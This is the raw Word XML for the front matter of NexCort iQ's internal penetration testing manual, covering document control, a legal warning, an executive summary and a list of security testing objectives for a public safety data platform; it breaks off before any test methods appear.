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r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">NEXCORT IQ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5A4D7A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Intelligence at the speed of response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="7C3AED" w:sz="4"/>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TESTING MANUAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="9B91BB"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RC-SEC-PENTEST-001</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="5A4D7A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Version 1.0  |  July 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="EF4444" w:sz="2"/>
          <w:bottom w:val="single" w:color="EF4444" w:sz="2"/>
        </w:pBdr>
        <w:shd w:fill="FFF5F5" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EF4444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFIDENTIAL — INTERNAL USE ONLY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="7F1D1D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  |  Do not distribute outside NexCort iQ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="5A4D7A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Apps on Demand LLC d/b/a NexCort iQ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="9B91BB"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorized use only — unauthorized testing is a federal offense under 18 U.S.C. § 1030 (CFAA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Document Control</w:t>
      </w:r>
    </w:p>
    <w:p>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80"/>
        <w:gridCol w:w="7200"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Document Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">NexCort iQ Penetration Testing Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Document ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RC-SEC-PENTEST-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CONFIDENTIAL — Internal Use Only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">NexCort iQ Security Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Last Updated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">July 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Review Cycle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7200"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Annually or after any significant platform change</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Approved By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CTO / VP Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Version History</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80"/>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="2520"/>
        <w:gridCol w:w="5040"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1080"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1080"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">July 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2520"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RC Security Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Initial release — all seven test categories, CJIS alignment, RC-specific attack surface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:color="EF4444" w:sz="8"/>
        </w:pBdr>
        <w:shd w:fill="FFF5F5" w:val="clear"/>
        <w:spacing w:after="120" w:before="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EF4444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠ WARNING: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="7F1D1D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This document contains detailed offensive security techniques. It is authorized for use by NexCort iQ security engineers and contracted penetration testing firms only. Unauthorized use of any technique described herein against systems you do not own or have explicit written permission to test is a criminal offense under the Computer Fraud and Abuse Act (18 U.S.C. § 1030) and the Electronic Communications Privacy Act (18 U.S.C. § 2511).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This manual defines the penetration testing program for the NexCort iQ public safety intelligence platform. NexCort iQ processes sensitive emergency communications data for 911 dispatch centers, law enforcement, fire rescue, EMS, and emergency management agencies. Many customers operate under CJIS Security Policy requirements, which mandates security assessments including penetration testing for systems that access Criminal Justice Information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This manual covers seven core penetration testing disciplines plus additional testing areas specific to the NexCort iQ technical stack. Each section defines the objective, methodology, tooling, NexCort iQ-specific attack surface, and pass/fail criteria.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing Objectives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify vulnerabilities before threat actors do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate CJIS Security Policy compliance (Section 5.10 — Security Assessment)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify RBAC role isolation across all nine NexCort iQ roles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm cross-tenant data isolation — no agency can access another agency's data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate API authentication and authorization on all endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test the Ring OAuth integration against certification requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm QR/NFC public endpoint hardening</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate CAD integration security boundary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm billing and pricing data is protected from unauthorized access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
